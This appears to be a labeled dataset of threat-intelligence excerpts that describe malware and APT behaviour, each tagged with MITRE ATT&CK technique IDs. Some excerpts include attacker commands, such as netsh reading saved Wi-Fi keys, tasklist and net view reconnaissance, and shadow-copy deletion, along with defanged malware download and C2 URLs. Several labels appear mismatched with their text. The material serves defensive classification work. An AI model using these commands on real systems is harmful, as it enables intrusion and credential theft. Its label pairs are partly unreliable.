{"text1":"All the strings used by the malware are encrypted and are decrypted by Rijndael\u00a0symmetric encryption algorithm in the \u201c<Module>.\\u200E\u201d function. This function receives a number as an input and generates three byte arrays containing input to be decrypted, key and IV (Figure 6","labels":"['T1140']"}
{"text1":"As with other adversaries that mine cryptocurrency opportunistically, Blue Mockingbird likes to move laterally and distribute mining payloads across an enterprise","labels":"['T1021.002', 'T1053.005', 'T1021.001']"}
{"text1":"In our analysis we could observe how the adversary ensures persistence by delivering an LNK file into the startup folder","labels":"['T1547.001']"}
{"text1":"ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus, also dubbed APT32 and APT-C-00","labels":"['T1027']"}
{"text1":"Executes VBScript using Process.Start. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Drops AdvancedRun.exe using File.WriteAllBytes. AdvancedRun.exe\" is a tool provided by Nirsoft to execute a program with different settings. Once the tool is dropped, the third stage DLL will leverage it to execute two commands in the context of the Windows TrustedInstaller group. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files. AdvanceRun is one of the tools that can be used to execute commands in the context of the TrustedInstaller user. This functionality is only available via CLI and requires the flag of \"\/RunAs 8\", which is shown in the commands below. The tool will be deleted from the %TEMP% directory after executing both commands. The first command leverages the Windows service control application (sc.exe) to disable Windows Defender","labels":"['T1562.001', 'T1078.001']"}
{"text1":"Stonedrill (Trojan.Stonedrill): Custom malware capable of opening a backdoor on an infected computer and downloading additional files. The malware also features a destructive component, which can wipe the master boot record of an infected computer","labels":"['T1561.002']"}
{"text1":"Services may be created with administrator privileges but are executed under system privileges, so an adversary can also use a service to escalate privileges from Administrator to System. They can also directly start services through Service Execution. 29],[30(link is external)] - During the STOLEN PENCIL operation in May 2018, Kimsuky used the GREASE malware. 32(link is external)] Kimsuky also targets Microsoft Office users by formatting their documents in a .docx file rather than .hwp and will tailor their macros accordingly","labels":"['T1036.004']"}
{"text1":"The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local mac address using GetAdaptersInfo","labels":"['T1016']"}
{"text1":"The QuietSieve malware family refers to a series of heavily-obfuscated .NET binaries specifically designed to steal information from the target host. If this check succeeds, a randomly-generated alphanumeric prefix is created and combined with the callback domain as a subdomain before an initial request is made over HTTPS","labels":"['T1016.001']"}
{"text1":"The \u201cDocuments,\u201d \u201cDownloads,\u201d \u201cDesktop,\u201d and \u201cPictures\u201d folders of every user are checked. The DLL file also examines drives other than C","labels":"['T1083']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1102.001']"}
{"text1":"The decrypted result is saved as \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d (T1001) 6) If the file size of \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe\u201d exceeds 4,485 bytes, it is executed","labels":"['T1547.001']"}
{"text1":"Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp","labels":"['T1204.002']"}
{"text1":"With domain administrator privileges obtained, the threat actors then moved laterally throughout the network using SMB and RDP to deploy Cobalt Strike beacons on the domain controllers around 1 hour after the initial execution of Bazar. On the domain controllers, some additional discovery was done using the PowerShell Active Directory module. After establishing Cobalt Strike beacons on those they felt ready to proceed to their final objectives","labels":"['T1021.002']"}
{"text1":"In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. These new processes will first spawn a net.exe processing with the view argument to gather a list of network accessible hosts. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted","labels":"['T1135', 'T1134.001']"}
{"text1":"This hardens the encryption of the network communication, as a single RC4 key will not decrypt the entire payload. Leverages existing Windows registry key that is enabled by default in Windows 10 to store configuration data. Generates unique session keys for each connection to the C2 server. Employs polymorphic code, changing its runtime footprint during code execution to thwart memory analysis and evade signaturing. Encrypts or decrypts function blocks (code blocks) during runtime, as needed, to evade detection. Uses position independent code (PIC) to throw off static analysis tools","labels":"['T1140']"}
{"text1":"Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I\/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I\/O handles to send and receive data between the C2 server and the command shell (see Figure 1","labels":"['T1059.003', 'T1564.003']"}
{"text1":"1) The malicious .rtf file exploits CVE-2017-11882. 3) The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp:\/\/mumbai-m[.]site\/b.txt. 4) b.txt contains a PowerShell command to download a dropper from: hxxp:\/\/dns-update[.]club\/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script","labels":"['T1059.001', 'T1140']"}
{"text1":"This backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service to act as the CnC server. The communication occurs via HTTPS over port 443","labels":"['T1071.001']"}
{"text1":"Once settles on victim\u2019s information systems, Egregor communicates with its Command and Control servers via HTTPS protocol so as to drop scripts or dynamic link libraries on infected hosts. You can find the list of C2 identified during investigations in section \u201cIP Addresses","labels":"['T1071.001']"}
{"text1":"OverWatch observed the threat actor retrieve three files with VBS file extensions from remote infrastructure. These files were then decoded using cscript.exe into an EXE, DLL and DAT file respectively. Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking.2","labels":"['T1574.001']"}
{"text1":"These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. For systems that have not had MS17-010 applied, the EternalBlue and EternalRomance exploits are leveraged to compromise systems. The exploit launched against the victim system depends on the operating system of the intended target","labels":"['T1210']"}
{"text1":"Commands received from the control server are encoded DWORDs - After decoding, these DWORDs should be in the range 123459h to 123490h","labels":"['T1132.002']"}
{"text1":"Basically, the shellcode\u2019s main purpose is to launch other code stored in the registry key \\REGISTRY\\SOFTWARE\\Microsoft\\DRM. Below is the disassembled shellcode and commentaries for interested readers","labels":"['T1012']"}
{"text1":"In observed traffic these HTTP response bodies attempt to appear like benign XML related to .NET assemblies, but command data is actually spread across the many GUID and HEX strings present. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings","labels":"['T1001.002']"}
{"text1":"Turla has many names in the information security industry \u2014 it is also known as Snake, Venomous Bear, Uroburos and WhiteBear. Turla\u00a0likes to use compromised web servers and hijacked satellite connections for their command and control (C2) infrastructure. Instead, they use a compromised system inside the targeted network as a proxy, which forwards the traffic to the real C2 server. Well-known malware like Crutch or Kazuar are attributed to Turla. Lately, we have also seen research that has shown potential links between the Sunburst backdoor and Turla. Not every campaign run by Turla can clearly be attributed to them","labels":"['T1090.001']"}
{"text1":"The C2 server will respond to the HTTP requests to the \u201cbat&m=d\u201d URL with a batch script that update.vbs will save to the \u201cdn\u201d folder and execute. The output of the downloaded batch script is saved to a text file in the \u201cup\u201d folder and uploaded to the C2 server via an HTTP POST request to the following URL","labels":"['T1074.001']"}
{"text1":"We saw a Waterbear loader named \"ociw32.dll\" inside one of the folders in the %PATH% environmental variable. This DLL name is hardcoded inside \"mtxoci.dll\" which is loaded by\u00a0the MSDTC service during boot-up. mtxoci.dll\u201d first tries to query the registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\" to see if the value \"OracleOciLib\" exists. If so, it retrieves the data inside it and loads the corresponding library. If the value doesn't exist, \u201cmtxoci.dll\u201d tries to load \"ociw32.dll\" instead. During our investigation, we noticed that the value \"OracleOciLib\" was deleted from the victim's machine, as shown in Figure 2. Hence, the malicious loader \"ociw32.dll\" was loaded and successfully executed on the host","labels":"['T1112']"}
{"text1":"This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. Gamaredon has used, maintained and updated development of this code for years. Its code contains anti-detection functions specifically designed to identify sandbox environments in order to thwart antivirus detection attempts","labels":"['T1497']"}
{"text1":"Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL","labels":"['T1574.002']"}
{"text1":"Embedded Trojan This Trojan loaded by the first payload contains several embedded executables that it uses to ultimately download and execute a secondary payload, as well as downloading and opening a decoy document. Upon execution, this Trojan checks to see if it was configured with \"BINDERON\" to determine if it should extract an embedded payload from a resource named \"B\", save it to %TEMP%\\%BIND1%, and create a new process with the embedded payload. While the Trojan was configured to carry out this activity, the actor did not embed a payload within the \"B\" resource, so this functionality does not carry out any activities, rather it just causes an exception and continues running. Another configuration option encountered by this Trojan is a check for '%STARTUPON%'. This sample was not configured to execute with this option enabled, however, should this option be enabled, the Trojan would attempt to install itself to the system at a specific location by writing its contents in base64-encoded format to the following file","labels":"['T1140']"}
{"text1":"On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call \u201cServHelper\u201d based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the \u201ctunnel\u201d variant of ServHelper, described in the \u201cMalware Analysis\u201d section","labels":"['T1204.001', 'T1204.002']"}
{"text1":"VALUEVAULT is a Golang compiled version of the \u201cWindows Vault Password Dumper\u201d browser credential theft tool from Massimiliano Montoro, the developer of Cain & Abel","labels":"['T1555.004']"}
{"text1":"Contains two DLL function exports: start and ss2 - Not dropped to the disk - Responsible for terminating processes and stopping\/disabling services related to endpoint security - Responsible for file encryption - Responsible for creating multiple worker threads for encryption - Responsible for creating the ransom notes - No longer uses the process rundll32.exe as a loader, but instead uses the MegaCortex binary as the DLL loader - Responsible for deleting volume shadow copies using vssadmin.exe and wiping deleted data from all drives using cipher.exe","labels":"['T1561.001']"}
{"text1":"The TerraLoader code performs several integrity checks before dropping the payload. These checks implement anti-debugging techniques and try to identify anomalies to prevent execution in sandboxed environments. Some of these techniques range from detecting incorrect parameters, filenames and extensions, to detecting hardware breakpoints or identifying specific modules loaded into the subject process. Should these checks all pass, the actual payload is decrypted and executed","labels":"['T1497.001']"}
{"text1":"The script is executed by the scheduled task used to maintain persistence, with its main goal being","labels":"['T1053.005']"}
{"text1":"Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The malicious emails display a strong command of the English language, and their content may have been taken from legitimate emails relevant to the business of the targeted organization. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright","labels":"['T1559.002']"}
{"text1":"If I open up the WebCacheV01.dat file in ESEDatabaseView or BrowsingHistoryView, I see browsing history leading up to my testing. Initially, I thought it was grabbing a copy of the file from a previous Volume Shadow Copy (VSC) but that isn\u2019t the case. Esentutl.exe is able to use the Volume Shadow Copy service to make a backup of a locked file","labels":"['T1003.003']"}
{"text1":"1) These lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange (DDE) protocol in order to gain access to victim machines. 2) Once the Gallmaker attackers gain access to a device, they execute various tools, including","labels":"['T1204.002', 'T1559.002']"}
{"text1":"The GoldMax malware was discovered persisting on networks as a scheduled task impersonating systems management software. In the instances it was encountered, the scheduled task was named after software that existed in the environment, and pointed to a subfolder in ProgramData named after that software, with a similar executable name. The executable, however, was the GoldMax implant","labels":"['T1036.004', 'T1036.005']"}
{"text1":"Prior to execution of any recon command to gather information from the target machine, the default codepage of the console is changed to \u201c65001\u201d (utf-8","labels":"['T1082']"}
{"text1":"The malware cleans the system event logs using OpenEventLog\/ClearEventLog APIs, and then terminates the setup procedure with a call to StartService to run the stage 4 malware","labels":"['T1070.001']"}
{"text1":"APT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes","labels":"['T1003', 'T1003.001']"}
{"text1":"Discovery of a Stealthy New Malware: \u201cCSPY Downloader\u201d is a tool designed to evade analysis and download additional payloads","labels":"['T1105']"}
{"text1":"The payload is embedded in\u00a0the macro as Base64 code. It uses the certutil program to decode the Base64 into a PE file which is then\u00a0executed","labels":"['T1140']"}
{"text1":"Scheduled tasks enable administrators to run tasks or \u201cjobs\u201d at designated times rather than every time the system is booted or the user logs in. This feature can be implemented via the Windows COM API, which the first versions of Ramsay have tailored. Based on the high ratio of similarity with Carberp\u2019s implementation, it\u2019s highly probable that Ramsay\u2019s implementation was adapted from Carberp\u2019s publicly available source code","labels":"['T1559.001', 'T1053.005']"}
{"text1":"48b9e25491e088a35105274cae0b9e67 MD5 hash of the current timestamp calculated during execution. MD5 hash of the current timestamp calculated during execution. 5-15 Lower\/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - Lower\/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - 0 0 or 1 \u2014 Utilize \u201cblend-in\u201d traffic requests. Internally called \u201cfalse_requesting\u201d - 0 Activate execution timestamp (0 by default) \u2014 execution \"activates\" or continues if current time is greater than the value in the configuration - Activate execution timestamp (0 by default) \u2014 execution \"activates\" or continues if current time is greater than the value in the configuration - - Base64-encoded User-agent used in HTTPS requests","labels":"['T1124']"}
{"text1":"MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks","labels":"['T1020']"}
{"text1":"Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443","labels":"['T1571']"}
{"text1":"The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key","labels":"['T1106']"}
{"text1":"The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy","labels":"['T1587.002']"}
{"text1":"persistence: Somewhat interestingly, OSX\/Dok persists in two phases. First as a Login Item, then as Launch Agents. When Dok is (naively) launched by the user, it will executed logic to persist as a Login Item. As their name implies, Login Items will execute an application when the user logs in. Apple describes how to create a Login Item both manually and programmatically","labels":"['T1059.002']"}
{"text1":"The NOKKI payload is written to %LOCALAPPDATA%\\MicroSoft Updatea\\svServiceUpdate.exe prior being executed in a new process. Persistence is achieved by writing the file path to the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svstartup registry key","labels":"['T1547.001']"}
{"text1":"Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on","labels":"['T1033', 'T1069.002']"}
{"text1":"The following command line is a service created by CobaltStrike and can be found in Windows Event Logs (event id 7045). It runs an encoded powershell command","labels":"['T1059.001']"}
{"text1":"When a victim opens the document, Microsoft Word asks to enable\/disable macros. It reveals that a macro is embedded in the document","labels":"['T1059.005']"}
{"text1":"From my analyses, I was able to identify http:\/\/mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently. Additionally, on that same url, http:\/\/mdzz2019.noip[.]cn:3654\/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell","labels":"['T1568.001']"}
{"text1":"The plugin proceeds to iterate through all connected drives on the system, looking for removable drives","labels":"['T1120']"}
{"text1":"Ahnlab, a South Korean software company, simultaneously published a paper regarding Bisonal's activity in South Korea. The initial stage is a binary that drops a decoy document (Powerpoint or Excel document), a VisualBasic script and the packed Bisonal payload. The payload is dropped with a .jpg extension that's been renamed to \".exe. Here is an example decoy document: The purpose of the VisualBasic script is to execute the payload. Although the malicious part of the binary is only 2MB, the final file is more than 120MB in size, padded out with random data. The payload has been packed with a new packer. The code of Bisonal is similar to the version of 2019","labels":"['T1036']"}
{"text1":"This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms","labels":"['T1547.001']"}
{"text1":"The code then uses the identified functions to add persistency through registry and add next stages file names identifier through the following locations","labels":"['T1037.001']"}
{"text1":"As happens so many times, it contains a Visual Basic script that will execute the malicious activities. This ZIP file contains a Python interpreter and Python script that is actually the RAT. The Word macro will unzip and execute the main script called \"launcher.py. The launcher script is responsible for checking the environment that the doc is currently being opened in. It assumes that all sandboxes will have hard drives smaller than 62GB. If it's in a sandbox environment, it will overwrite the malware scripts with the contents of the file \"License.txt\" and exit, thus deleting itself. Anti-sandbox code If it determines that it is not running in a sandbox environment, it will generate a unique ID, that is then replaced directly with the Python source code of the main scripts before executing it","labels":"['T1070.004']"}
{"text1":"Listing the C:\/ drive contents using cd C:\/; ls; - Listing the specific Wi-Fi profile details using netsh wlan show profiles name='<Name>' key=clear; - Listing the drives using Get-PSDrive","labels":"['T1083', 'T1049']"}
{"text1":"1) Use of zip file that contains a \u201c.lnk\u201d (Windows Shortcut) file. 2) Utilization of double extension trick (sample.doc.lnk) to convince users to open the file. 3) HTA (HTML Application) with VBScript embedded in the \u201c.lnk\u201d file 4) VBScript drops payloads and opens a decoy document or PDF to the user","labels":"['T1059.005']"}
{"text1":"The malware\u2019s second functionality is to gain persistence on an infected machine. After obtaining persistence, the next functionality of Linux Rabbit is to brute force SSH passwords which ultimately allows the malware to install the cryptocurrency miner onto the server. The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is \u201cblacklisted,\u201d it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine\u2019s hostname. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has","labels":"['T1033']"}
{"text1":"txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency","labels":"['T1056.001', 'T1557']"}
{"text1":"1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)\/module 274 (proxy) by the stager","labels":"['T1071.001']"}
{"text1":"To start, the implant looks for the AHNLAB V3 Antivirus software's class name \"49B46336-BA4D-4905-9824-D282F05F6576\". If the software is found, the implant will hide the AV software window from the view of the infected user","labels":"['T1564.003', 'T1562.001']"}
{"text1":"Exfiltrated data is encrypted using an RSA public key, preventing third parties from decrypting it. An example exfiltration request is below","labels":"['T1027']"}
{"text1":"Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective","labels":"['T1049']"}
{"text1":"REDBALDKNIGHT\u2019s use of steganography isn\u2019t limited to Daserf. Based on their pdb strings, they\u2019re both components of another REDBALDKNIGHT-related threat, XXMM (TROJ_KVNDM), a downloader Trojan that can also act as a first-stage backdoor with its capability to open a shell. While xxmm2_builder allows REDBALDKNIGHT to customize the settings of XXMM, xxmm2_ steganography is used to hide malicious code within an image file","labels":"['T1001.002']"}
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) \u2014 This simple downloader's code is similar to the main xxmm payload. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1027.001']"}
{"text1":"cmd \/c tasklist: Executes this command to collect a list of running processes on victim\u2019s machine and store them in a tmp file","labels":"['T1005', 'T1082']"}
{"text1":"The malware will actually search through the \/Users\/ folder looking for executable files. When it finds one, it will prepend malicious code to the beginning of the file. This means that when the file is executed, the malicious code is executed first. That code will then copy the legit file content into a new, invisible file and execute that","labels":"['T1036.005', 'T1554']"}
{"text1":"APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits","labels":"['T1566.001']"}
{"text1":"Current variants will often drop or retrieve secondary executables to inject into, or they will attempt to inject into known (and vulnerable) binaries already present on targeted hosts","labels":"['T1055']"}
{"text1":"As described in the analysis of the group\u2019s previous macOS backdoor, a clientID is created. This identifier is the MD5 hash of the return value of one of the following commands","labels":"['T1082']"}
{"text1":"The C2 domain used in this shellcode has been categorized as malware in DNS Security, URL Filtering and WildFire, which are security subscriptions for Next-Generation Firewall customers. App-ID, the traffic classification system in Next-Generation Firewalls, is capable of identifying applications irrespective of port, protocol, encryption (SSH or SSL) or any other evasive tactic used by the application. This shellcode attempts to communicate over TCP port 443 with traffic that does not conform to proper SSL or any other known application. As a matter of best practice, we advise customers to block unknown outbound TCP traffic in their security policies","labels":"['T1571']"}
{"text1":"Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte","labels":"['T1140']"}
{"text1":"Once the malware was persisted and kicked off the launch items, it invokes a function named create_rescue_executable to create yet another copy of itself. This copy will made in the user\u2019s Library directory. Its named starts with a . so that it won\u2019t show up in the UI (i.e. Finder.app), and is then followed via 9 random characters","labels":"['T1564.001']"}
{"text1":"The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1059.003']"}
{"text1":"Execute Pluginhost.exe, the plugin management component. Save the payloads as Alternate Data Streams and set scheduled tasks to run them","labels":"['T1564.004']"}
{"text1":"Upon execution, GoldMax retrieves a list of the system\u2019s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a","labels":"['T1016']"}
{"text1":"As with much of the malware distributed by TA505, The Trick has appeared in frequent, high-volume campaigns. The campaigns used a mix of attached zipped scripts (WSF, VBS), malicious Microsoft Office documents (Word, Excel), HTML attachments, password-protected Microsoft Word documents, links to malicious JavaScript, and other vectors. The last TA505 campaigns featuring The Trick appeared in mid-September 2017 with payloads alternating between Locky and The Trick","labels":"['T1027', 'T1204.001', 'T1204.002']"}
{"text1":"As a Windows Management Instrumentation (WMI) client application, it initializes COM and connects to the \\\\root\\cimv2 namespace to use the IWbemServices pointer and make WMI requests. The code executes wql queries (\u201cwql\u201d is \u201csql for wmi\u201d, a subset of sql) to gather victim host details, like the query \u201cSELECT Description, Manufacturer, Name, ProcessorId FROM Win32_Processor\u201d. Here are several queries from the BlackEnergy2 plugin code","labels":"['T1047']"}
{"text1":"Cisco Talos' previous research has mainly linked this group to CrimsonRAT, but new campaigns show they are expanding their Windows malware arsenal with ObliqueRAT. The victim is encouraged to click on an embedded URL hosted on sharingmymedia[.]com, which then downloads ObliqueRAT, the trojan discovered by Talos in 2020 associated with threat activity targeting entities in South Asia. We cannot confirm how the maldocs were delivered to victims, but we suspect they were probably sent as attachments to phishing emails based on previous threat actor behavior and the targeted nature of this particular lure. In such cases, adversaries would deliver phishing maldocs to targets containing a malicious VBA macro that extracted either the CrimsonRAT executable or a ZIP archive embedded in the maldoc. For example, attackers leveraging ObliqueRAT started hosting their malicious payloads on compromised websites instead of embedding the malware in the maldoc. After enabling macros, the file executes CrimsonRAT on the endpoint.Figure 4: The \"Download Now\" button contains a link to a malicious XLS with CrimsonRAT embedded in it. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. In a few of these instances, the malicious executables in the archives contained honeytrap-themed icons to entice the victims into executing them","labels":"['T1204.001']"}
{"text1":"The back door Java file uses a custom class loader that loads encrypted class files (named Opcion[1-14]) as it receives commands from the RAT controller server. The key, specified by the attacker when creating the back door, is used to encrypt the class files using DES as a stream cipher","labels":"['T1027']"}
{"text1":"The results are Gzipped and saved under random file in the temp folder. Following successful collection of information, the data is send back to the C2 and the file is deleted","labels":"['T1074.001', 'T1560.001']"}
{"text1":"Below is an example of anti-analysis technique showing the loader checking if the victim system is a Vmware or VirtualBox VM","labels":"['T1497.001']"}
{"text1":"POWRUNER may also receive batch commands from the C2 server to collect host information from the system. An example batch command is provided in Figure 11","labels":"['T1069.002', 'T1069.001', 'T1087.002']"}
{"text1":"First, just like the Gh0st in the dshell paper from SANS, the decrypted protocol consists of a 5 byte header (ngLGX), a 4byte packet length field, and finally another 4 byte uncompressed length field. This is where the similarity ends as the Opcode and the data are compressed using ZLib, instead of just the data. Additionally, the entire packet is encrypted with an algorithm making visual analysis of the Wireshark data challenging. However, as the packet header is static, you can use the encrypted header as an identifier, like I did in my script. The encrypted header is: \u201c\\xEA\\xEE\\xCC\\xD3\\xB8\u201d and is unchanged throughout the malware\u2019s runthrough","labels":"['T1132.001']"}
{"text1":"Attackers like to use spear-fishing email with password protected RAR attachment to avoid being detected by the email gateway. Decryption password is provided in the mail body and inside the attachment it is a MHTML macro based document with the .doc suffix. Its purpose is to implant Imminent backdoor and gain a foothold into the target network which may make the follow up lateral movement easier to implement","labels":"['T1027']"}
{"text1":"This cabinet file is then extracted to the previously identified file path. Again, a shortcut file is written to the %TEMP% path with a name of \u2018~Update.lnk\u2019, which is in turn copied to the identified startup path with a filename of \u2018Windows help.lnk\u2019. This shortcut file calls the built-in \u2018control.exe\u2019 utility to in turn load the previously dropped malicious CPL file of \u2018winhelp.cpl\u2019. Finally, the malware calls the \u2018winhelp.cpl\u2019 file in a new process via the following command","labels":"['T1012']"}
